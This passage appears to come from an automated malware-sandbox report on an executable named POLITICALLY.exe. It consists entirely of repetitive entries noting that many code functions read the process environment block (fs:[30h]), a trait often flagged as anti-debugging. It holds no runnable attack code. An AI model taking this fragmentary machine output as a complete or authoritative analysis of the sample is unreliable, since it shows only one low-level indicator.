        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2476E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E278EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2636CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E248794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2737F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2BA537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E273D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B3540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2E3D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E257D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2635A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E248A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E253A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FEA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2C4257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E305BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2ED380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2790AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2358EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]
